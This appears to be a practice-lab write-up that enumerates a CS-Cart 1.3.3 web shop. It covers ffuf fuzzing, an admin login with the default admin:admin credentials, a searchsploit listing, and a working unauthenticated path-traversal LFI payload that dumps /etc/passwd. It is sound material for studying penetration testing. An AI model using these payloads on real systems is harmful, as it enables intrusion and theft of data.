Web
Nmap discovered a Web server on the target port 80
The running service is Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ curl -I http://$IP/
HTTP/1.1 200 OK
Date: Sat, 08 Feb 2025 20:11:34 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
X-Powered-By: PHP/5.2.3-1ubuntu6
Expires: -1
Last-Modified: Sat, 08 Feb 2025 20:11:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csid=31f41023c7083a60ca3aa1377b4c95a2; expires=Sat, 08-Feb-2025 22:11:34 GMT; path=/; domain=.192.168.198.39
Set-Cookie: csid=31f41023c7083a60ca3aa1377b4c95a2; path=/; domain=.192.168.198.39
Set-Cookie: cart_languageC=EN; domain=.192.168.198.39
Set-Cookie: cart_languageC=EN; domain=.192.168.198.39
Set-Cookie: secondary_currencyC=usd; domain=.192.168.198.39
Set-Cookie: secondary_currencyC=usd; domain=.192.168.198.39
Content-Type: text/html/Practice/PayDay/2-Enumeration/attachments/{A647A39A-7B92-4169-84F4-29553C31917A}.png)
Webroot
It claims that to be a demo online shop, built-on an application called, CS-Cart
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.198.39/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess [Status: 403, Size: 309, Words: 22, Lines: 11, Duration: 23ms]
Thumbs.db [Status: 200, Size: 1, Words: 1, Lines: 2, Duration: 18ms]
addons [Status: 301, Size: 335, Words: 21, Lines: 10, Duration: 19ms]
admin [Status: 200, Size: 9483, Words: 393, Lines: 263, Duration: 52ms]
.htpasswd [Status: 403, Size: 309, Words: 22, Lines: 11, Duration: 2161ms]
apache2-default [Status: 301, Size: 344, Words: 21, Lines: 10, Duration: 18ms]
catalog [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 19ms]
cgi-bin/ [Status: 403, Size: 308, Words: 22, Lines: 11, Duration: 20ms]
chart [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 84ms]
classes [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 21ms]
config [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 28ms]
core [Status: 301, Size: 333, Words: 21, Lines: 10, Duration: 20ms]
images [Status: 301, Size: 335, Words: 21, Lines: 10, Duration: 19ms]
image [Status: 200, Size: 1971, Words: 16, Lines: 12, Duration: 47ms]
include [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 20ms]
init [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 19ms]
index [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 87ms]
install [Status: 200, Size: 7731, Words: 346, Lines: 220, Duration: 35ms]
payments [Status: 301, Size: 337, Words: 21, Lines: 10, Duration: 19ms]
prepare [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 21ms]
server-status [Status: 403, Size: 313, Words: 22, Lines: 11, Duration: 21ms]
shippings [Status: 301, Size: 338, Words: 21, Lines: 10, Duration: 19ms]
skins [Status: 301, Size: 334, Words: 21, Lines: 10, Duration: 18ms]
targets [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 20ms]
var [Status: 301, Size: 332, Words: 21, Lines: 10, Duration: 21ms]
:: Progress: [20478/20478] :: Job [1/1] :: 1980 req/sec :: Duration: [0:00:13] :: Errors: 0 ::Many endpoints
config
/Practice/PayDay/2-Enumeration/attachments/{B528390F-FDE0-442D-A93C-11E2B073BD94}.png)
N/A
init
/Practice/PayDay/2-Enumeration/attachments/{5CA0B1FE-EF77-4631-8F7E-8D8246A5ED9C}.png)
N/A
install
/Practice/PayDay/2-Enumeration/attachments/{4169B0A2-E6DF-4FE7-97A7-4FC52523A325}.png)
The /install endpoint appears to support a installation wizard
There is a version leak; 1.3.3
classes
/Practice/PayDay/2-Enumeration/attachments/{321454FE-CA6E-4D40-8903-25FFB30173EB}.png)
Directory listing is enabled here
admin
/Practice/PayDay/2-Enumeration/attachments/{444EBE8C-3E28-4D72-857C-FF9CA4FA7EED}.png)
/Practice/PayDay/2-Enumeration/attachments/{873511C8-E6AD-444C-950F-25A06DF36FEA}.png)
Testing default/weak credential; admin:admin
/Practice/PayDay/2-Enumeration/attachments/{74FA20E6-BFFA-4820-B855-9F78B86C4A2D}-1.png)
Authenticated
Vulnerabilities
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ searchsploit CS-Cart
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
CS-Cart - Multiple SQL Injections | php/webapps/27030.txt
CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting | php/webapps/31443.txt
CS-Cart 1.3.3 - 'classes_dir' LFI | php/webapps/48890.txt
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion | php/webapps/1872.txt
CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting | multiple/webapps/14962.txt
CS-Cart 1.3.3 - authenticated RCE | php/webapps/48891.txt
CS-Cart 1.3.5 - Authentication Bypass | php/webapps/6352.txt
CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection | php/webapps/8184.txt
CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection | php/webapps/33146.txt
CS-Cart 2.2.1 - 'products.php' SQL Injection | php/webapps/36093.txt
CS-Cart 4.2.4 - Cross-Site Request Forgery | php/webapps/36358.html
CS-Cart 4.3.10 - XML External Entity Injection | php/webapps/40770.txt
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No ResultsThe version information has been identified, and there are a lot of vulnerabilities in the CS-Cart application.
LFI
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ searchsploit -x php/webapps/48890.txt
Exploit: CS-Cart 1.3.3 - 'classes_dir' LFI
URL: https://www.exploit-db.com/exploits/48890
Path: /usr/share/exploitdb/exploits/php/webapps/48890.txt
Codes: N/A
Verified: False
File Type: ASCII text
# Exploit Title: CS-Cart unauthenticated LFI
# Date: 2020-09-22
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example:
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00One of the exploits target LFI
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ curl -s http://$IP/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
dovecot:x:104:111:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
postfix:x:105:112::/var/spool/postfix:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
<br />
<b>Fatal error</b>: Class 'PHPMailer' not found in <b>/var/www/classes/phpmailer/class.cs_phpmailer.php</b> on line <b>6</b><br />LFI Confirmed